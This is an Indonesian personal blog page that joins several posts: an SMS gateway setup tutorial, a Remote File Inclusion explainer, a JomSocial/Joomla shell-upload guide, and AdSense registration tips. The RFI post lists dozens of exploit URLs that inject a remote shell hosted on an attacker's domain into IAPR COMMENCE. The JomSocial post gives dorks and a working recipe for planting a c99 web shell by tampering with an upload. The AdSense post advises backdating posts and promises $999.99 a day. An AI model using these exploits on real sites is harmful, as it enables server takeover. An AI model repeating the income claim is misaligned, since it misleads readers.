SMS Gateway

Selasa, 24 Juli 2012

maaf ya kalo tutorialnya agak berantakan, ga pandai nulis soalnya.. hehehe
kali ini ane mau belajar bikin tutorial membangun sms gateway. . sms gateway?? ane juga kurang ngerti artinya apaan. ane lagi iseng2 aja nyari cara buat smsan dengan menggunakan modem usb di linux. ga taunya malah nemu ginian.. kalo kata orang dengan sms gateway kita bisa nampung ribuan sms dikotak masuk kita dengan mengandalkan database mysql..
langsung saja yak..

pertama2 kita harus menginstal bumbu yang diperlukannya dlu. .

1. Install Apache2nya dlu. .

# sudo apt-get install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils

2. abis itu install PHP'a dlu. .

# sudo apt-get install libapache2-mod-perl2 mysql-server-5.1 libapache2-mod-php5 php5-cgi php5-curl php5-gd php5-mysql php-pear

3. kalo udah truz install mysql'a. .

# sudo apt-get install mysql-server mysql-client

4. nah, sekarang install phpmyadminnya dlu..

# sudo apt-get install phpmyadmin

5. terakhir kita tinggal install gammu untuk tool smsannya..

kita tambahkan dlu repo untuk menginstall gammunya,,

# sudo gedit /etc/apt/sources.list

tambahkan baris berikut. .

# deb http://repo.ugm.ac.id/ppa.launchpad.net/gammu lucid main

truz download gpg key gammunya..

# sudo wget ftp://repo.ugm.ac.id/ekstra/.ugos_tools/key_gammu

tambahin gpg key ke dalem system. .

#  sudo apt-key add key_gammu

nah, sekarang baru install gammu dan librarynya..

# sudo apt-get install gammu gammu-smsd libgammu7 libgsmsd7

oke, sekarang kita lihat port device yang digunakan oleh modem..

# sudo dmesg | grep tty*
[ 1530.136567] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB0
[ 1530.137077] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB1
[ 1530.137533] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB2 [ 1530.138024] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB3

nah sekarang kita konfigurasi gammunya. .

# sudo gammu-config

nnt bakal muncul form buat settingannya, isi dengan variabel seperti dibawah dan pilih Save. .

port = /dev/ttyUSB1 # disesuaikan
connection = at115200 # disesuaikan
synchronizetime = yes
logfile = /etc/gammulog
logformat = textall use_locking = # isi yes jika ingin resource modem di kunci

perintah di atas bakal nyimpen konfigura di /root/.gammurc sekarang konfigurasi file /etc/gammu-smsdrc:

# sudo gedit /etc/gammu-smsdrc  
[gammu]
port = /dev/ttyUSB1 # disesuaikan dgn yang tadi connection = at115200 # disesuaikan dgn yang tadi

[smsd]
service = sql
driver = native_mysql
DeliveryReport =sms
logfile = /etc/smsdlog debuglevel = 1 # change to 255 if you want to debug

User = root # disesuaikan
password = root # disesuaikan
pc = localhost database = gammu

sekarang kita cek identify modemnya..

# sudo gammu --identify
Manufacturer : Manufacturer
Model : unknown (HSPA USB MODEM)
Firmware : LQA0094.1.2_MG32
IMEI : 352161046194464
SIM IMSI : 510080306788834

sekarang kita buat database mysql'a untuk nampung sms2 kita..
masuk kedirectory /usr/share/doc/gammu/examples/sql

# cd /usr/share/doc/gammu/examples/sql
truz masuk ke mysql'a dan buat databasenya..

# mysql -u root -p
Enter password: (masukkan password mysql kita)

# mysql> create database gammu;
Query OK, 1 row affected (0.01 sec)

# mysql> exit
Bye

# mysql -u root -p gammu < mysql.sql
Enter password:

# mysql> show databases;

+--------------------+
| Database |
+--------------------+
| information_schema |
| db_albalonns |
| gammu |
| kalkun |
| mysql |
| phpmyadmin |
+--------------------+
6 rows in set (0.00 sec)

# mysql> use gammu;
Database changed

# mysql> show tables;
+------------------+
| Tables_in_gammu |
+------------------+
| daemons |
| gammu |
| inbox |
| outbox |
| outbox_multipart |
| pbk |
| pbk_groups |
| phones |
| sentitems |
+------------------+
9 rows in set (0.00 sec)

# mysql> exit
Bye

oke sekarang kita coba sms janda yang buahenol yuk. .

# sudo gammu --sendsms text 021xxxxxxx
# sudo: unable to resolve host lovelucy
# Enter message text and press ^D:
# Halo tante, godain kita2 donk. . If you want break, press Ctrl+C...
# Sending SMS 1/1....waiting for network answer..OK, message
# reference=19
# albalonns@lovelucy:~$

kalo mau cek pulsa (contoh:simpati). .

# sudo gammu --getussd *888#
Press Ctrl+C to break...
USSD received Status : No action needed Service reply : “Sisa Pulsa Anda Rp.50,00. Penggunaan pulsa di periode ini Rp.00,00. Aktif s.d. 14/05/2011. Cari t4 menarik dsekitarmu dgn TelkomselLacak. Hub *123*55#”

Setelah itu, jalankan service gammu-smsd untuk aplikasi kalkun..

# sudo /etc/init.d/gammu-smsd start

oke, cukup segini dlu yak.. sebetulnya kita bisa explore lg dengan menginstall kalkun agar mempermudah untuk mengirim sms dan mengecek kotak masuk dan kotak terkirim kita. namun ane masih belum berhasil menampilkan isi database dari kotak masuk ke kalkunnya, masih coba2 lagi.. maklum ane cuma belajar dari mbah google dan para master yang baik hati.. mungkin kalo ada yang bisa, tolong di share yak om. . hehehehe..

Remote File Inclusion

Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:

include($my_ms[”root”].’/error.php’);

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com

JomSocial ~ Joomla Shell Upload Vulnerability

Barang yang Anda butuhkan:
Firefox
Shell Sebuah
tamper Data
rentan Situs
& Otak :)

persiapan:
1. Dapatkan shell sini. (merekomendasikan: c99.php)
2. Ambil Tamper Data
3. Cari situs vuln. * lihat Dorking *

dorks:
inurl :/ com_community /
inurl :/ images / originalvideos /
inurl :/ index.php? option = com_community & view = video

Mempersiapkan Shell Anda:
1. Ambil shell.
2. Masukkan ke dalam folder (ex. "myshell")
3. Salin shell ke folder yang sama dan nama ke "yourshell.php.flv"
4. Sekarang dalam folder Anda memiliki 2 file, "myshell.php" & "myshell.php.flv".

Mendapatkan akses ke situs:
1. Mendaftarkan account palsu.
2. Aktif account palsu Anda.
3. Pergi ke halaman profil Anda.
4. Klik Add Video.
5. Pilih meng-upload video dari komputer.

Meng-upload Shell Anda:
Upload video dari komputer Anda, perlu diketahui bahwa jika Anda hanya melihat Tambahkan video dari URL yang berarti situs tersebut tidak vuln.
Alasan karena telah menciptakan sebuah file yang bernama "myshell.php.flv", adalah untuk mengelabui uploader dengan berpikir bahwa Anda meng-upload file FLV.

Meng-upload shell:
1. Pergi ke halaman upload, klik pada video add.
2. Pilih Tambah video.
3. Pilih Upload dari Komputer.
4. Browse untuk Anda "myshell.php.flv".
5. Masukan Judul.
** sebelum Anda klik meng-upload **
6. Firefox -> Tools -> Tamper Data, klik pada Tamper Data Start.
7. Sekarang klik UPLOAD.
8. Data tamper akan menunjukkan jika Anda ingin mengutak-atik, hapus centang terus mengutak-atik kemudian klik pada tamper.
9. Cari "myshell.php.flv" kemudian hapus flv makna. Bagian Anda akan memiliki "myshell.php" kiri.
10. SUBMIT.
11. Tunggu, dan anda akan melihat halaman upload sukses.
12. Congrats Anda telah meng-upload shell.

Shell lokasi:
1. Pergi ke http:// [budak] / images / originalvideos /
2. Di sana Anda akan menemukan folder bernama dalam jumlah. (Anda kemungkinan besar folder terakhir / bawah)
3. Sebagian besar akan berisi folder flv,.. && Avi dll dll
4. Folder Anda akan berisi nama yang dihasilkan acak dengan ekstensi file PHP.
5. Buka "random.php" Anda
6. Dan IN Anda!

PengerTian Google Adsense . dan Cara Register Google Adsense Melaui BlogSpot

Minggu, 22 Juli 2012

AdSense adalah program kerjasama periklanan melalui media Internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit iklan yang bentuk dan materinya telah ditentukan oleh Google di halaman web mereka. Pemilik situs web atau blog akan mendapatkan pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.


Selain menyediakan iklan-iklan dengan sistem bayar per klik, Google AdSense juga menyediakan AdSense untuk pencarian (AdSense for Search) dan iklan arahan (Referral). Pada AdSense untuk pencarian, pemilik situs web dapat memasang kotak pencarian Google di halaman web mereka. Pemilik situs akan mendapatkan pemasukan dari Google untuk setiap pencarian yang dilakukan pengunjung melalui kotak pencarian tersebut, yang berlanjut dengan klik pada iklan yang disertakan pada hasil pencarian. Pada iklan arahan, pemilik situs akan menerima pemasukan setelah klik pada iklan berlanjut dengan tindakan tertentu oleh pengunjung yang telah disepakati antara Google dengan pemasang iklan tersebut.


Istilah-Istilah dalam AdSense


Publisher


Publisher adalah orang atau pemilik situs yang sudah bergabung dan memasang iklan AdSense di situs mereka.


Ad Units


Yang dimaksud dengan Ad Units adalah iklan AdSense itu sendiri. Ad Units terdiri dari beberapa jenis dan beberapa ukuran. Yang paling umum adalah jenis iklan teks. Pada saat pengunjung mengklik unit iklan ini, maka (jika sah) pemasang iklan akan mendapatkan pemasukan sesuai dengan nilai CPC-nya.


Link Units


Link Units hampir sama dengan Ad Units, hanya saja formatnya mirip dengan format menu yang biasa kita temui di situs-situs web. Yang membedakan Link Units dengan Ad Units adalah pada saat pengunjung meng-klik iklan ini, maka ia akan diarahkan pada halaman hasil pencarian di search engine Google. Publisher baru akan mendapatkan pemasukan apabila pengunjung mengklik salah satu Ad Unit yang ada di halaman tersebut. Pada prakteknya, Link Units terbukti menghasilkan pemasukan lebih banyak dibandingkan Ad Units biasa.


AdSense for Content


AdSense for Content adalah iklan AdSense yang dipasang di dalam suatu halaman. Iklan-iklan yang muncul adalah iklan-iklan yang berhubungan dengan isi halaman tersebut. Atau istilahnya menggunakan konsep kontekstual. Ad Units dan Link Units adalah yang termasuk dalam AdSense for Content ini.


Alternate Ads


Pada AdSense for Content, iklan tidak selalu muncul. Sebabnya antara lain bisa karena memang stok iklan yang berhubungan dengan isi situs sudah habis atau Google tidak dapat memperkirakan apa isi situs itu sebenarnya. Jika ini terjadi, secara default, yang ditampilkan adalah iklan layanan masyarakat atau sering dikenal dengan istilah PSA (Public Service Ads). Karena bertipe donasi, maka jika diklik, iklan ini tidak menghasilkan apa-apa bagi publisher. Untuk mengatasinya, Google memperbolehkan kita untuk memasang Alternate Ads atau iklan alternatif. Jika Ad Units yang dibuat telah diatur dengan menggunakan Alternate Ads, maka apabila Ad Units tersebut tidak dapat tampil, yang muncul adalah iklan alternatif yang telah diatur sebelumnya.


Channels


Channels adalah semacam label yang dapat diberikan pada Ad Units, Link Units, AdSense for Search, dan Referrals. Satu unit iklan dapat memiliki lebih dari satu label, dan sebaliknya, satu label dapat digunakan untuk lebih dari satu unit iklan. Di halaman laporan Google AdSense, hasil laporan akan dikelompokkan berdasarkan Channels, sehingga penggunaan Channels akan sangat memudahkan publisher untuk menganalisa performa AdSense mereka. Umumnya, publisher akan memberikan nama Channels yang sama pada unit-unit iklan yang ada di satu situs. Jika ingin lebih detail, sah-sah saja untuk memberikan nama Channels yang berbeda pada setiap unit iklan di masing-masing situs. Yang perlu diingat, maksimal jumlah Channels yang diperbolehkan saat ini adalah 200 kanal.


Page Impressions


Page Impressions adalah jumlah yang menunjukkan berapa kali halaman yang mengandung Ad Units dibuka oleh pengunjung. Nilainya tidak terpengaruh oleh kuantitas Ad Units yang ada di dalam halaman yang bersangkutan.


Clicks


Clicks adalah jumlah klik pada Ad Units milik publisher. Dalam halaman laporan AdSense, publisher dapat melihat total klik yang ia dapatkan, maupun berdasarkan Ad Units atau Channelnya.


CTR (Clickthrough Rate)


CTR adalah perbandingan dalam persen antara jumlah klik yang diterima suatu Ad Units dengan jumlah tampilan Ad Units tersebut. Misalnya, satu Ad Units yang ditampilkan 40 kali dan diklik 10 kali memiliki nilai CTR 25% (10:40).


CPC (Cost Per Click)


CPC adalah jumlah uang yang akan didapatkan oleh publisher apabila Ad Units tertentu diklik. Nilai CPC masing-masing Ad Units berbeda dan ditentukan oleh banyak faktor, termasuk performa dan kualitas situs milik publisher. Namun secara umum, nilai maksimal yang mungkin adalah 20% dari nilai tawaran dinamis yang ditawarkan oleh pemasang iklan.


eCPM (Effective CPM)


eCPM atau CPM (Cost Per Million) adalah hasil pembagian antara jumlah pendapatan publisher dengan jumlah impresi halaman (per 1.000) yang ia dapatkan dari iklan-iklannya. Sebagai contoh, publisher yang menghasilkan USD 200 dari 50.000 impressi akan memiliki nilai CPM sebesar USD 4 (USD 200 dibagi 50).


Kebijakan program AdSense


Meski program AdSense memberikan keuntungan yang besar, Google menetapkan aturan ketat untuk melindungi kepentingan semua pihak yang terlibat, termasuk pemasang iklan yang sering dirugikan oleh tindakan tidak terpuji pemilik situs anggota program AdSense. Beberapa larangan Google yang harus ditaati pemilik situs web atau blog peserta program AdSense adalah:
  • Mengklik iklan yang ditampilkan situs milik sendiri, baik dengan cara manual atau dengan bantuan perangkat lunak khusus
  • Dengan sengaja mendorong pengunjung situs untuk mengklik iklan yang ditampilkan, misalnya dengan kata-kata “klik iklan ini” atau “kunjungi halaman ini”
  • Mengubah bentuk dan ukuran unit iklan yang telah ditentukan Google
  • Membuat pranala langsung menuju halaman hasil pencarian AdSense untuk pencarian
  • Mengisi secara otomatis kotak pencarian AdSense dengan kata kunci (keyword) tertentu
  • Memanipulasi target iklan dengan katakunci tersembunyi atau dengan IFRAME
  • Kode unit iklan AdSense harus ditempatkan langsung pada kode html Situs web tanpa perubahan. Pemilik situs tidak diperbolehkan mengubah kode AdSense dengan alasan apapun, misalnya dengan tujuan menampilkan hasil klik di jendela pop up atau mengalihkan target iklan. 


Optimisasi Penghasilan AdSense


Potensi keuntungan mengikuti program AdSense membuat banyak pemilik situs web mengembangkan berbagai metode untuk meningkatkan jumlah klik pada iklan yang mereka tayangkan. Sebagian metode terbukti ilegal dan melawan kebijakan resmi program AdSense. Metode yang lain diperbolehkan, bahkan didorong penggunaannya oleh Google. Beberapa metode yang dianggap sah adalah:
  • Memodifikasi warna unit iklan menggunakan palet warna yang disediakan AdSense
  • Meletakkan unit iklan pada posisi tertentu pada halaman web yang dianggap memiliki tingkat keterbacaan tinggi
  • Menghilangkan garis tepi unit iklan dan menyamakan warna latarnya dengan warna latar halaman web sehingga unit iklan terlihat membaur dengan isi halaman

    Cara Paling Jitu Dan Manjur , Register Google Adsense Dengan Menggunakan Blogspot
    Langsung Saja
    • Buat Email BAru Gmail
    • Buat Blog Dengan Blogspot
    • Posting Article Sekitar 11 [ Usahakan , Tanggal , Hari Dan Jam'nya Berbeda ]  Dan Usahakan postingan Pertama Rubah Tahun Terbitnya Sekitar tahun 2011
    • Gunakan Template Standar Blogspot ( jangan Ada Readmore ) Biarkan Saja Default
    • buat 4 Navigasi [ Home . Contack . Privacy Policy . Sitemap ]
    • Usahakan Yang 11 postingan Lebih Dari 800 Kata Dan Ada Gambar
    • Seting 5 Article Di Home PAge .
    • Sumbsit Url Blog Ke Goolge dan Webmaster usahakan Dapat Status Verifikasi dari Goolge
    • Setelah Umur Blog Anda 1 minggu Registrasi Ke Google Adsense Lewat BlogSpot .
    • finish Dan Nikmati Uang $999.99/Day .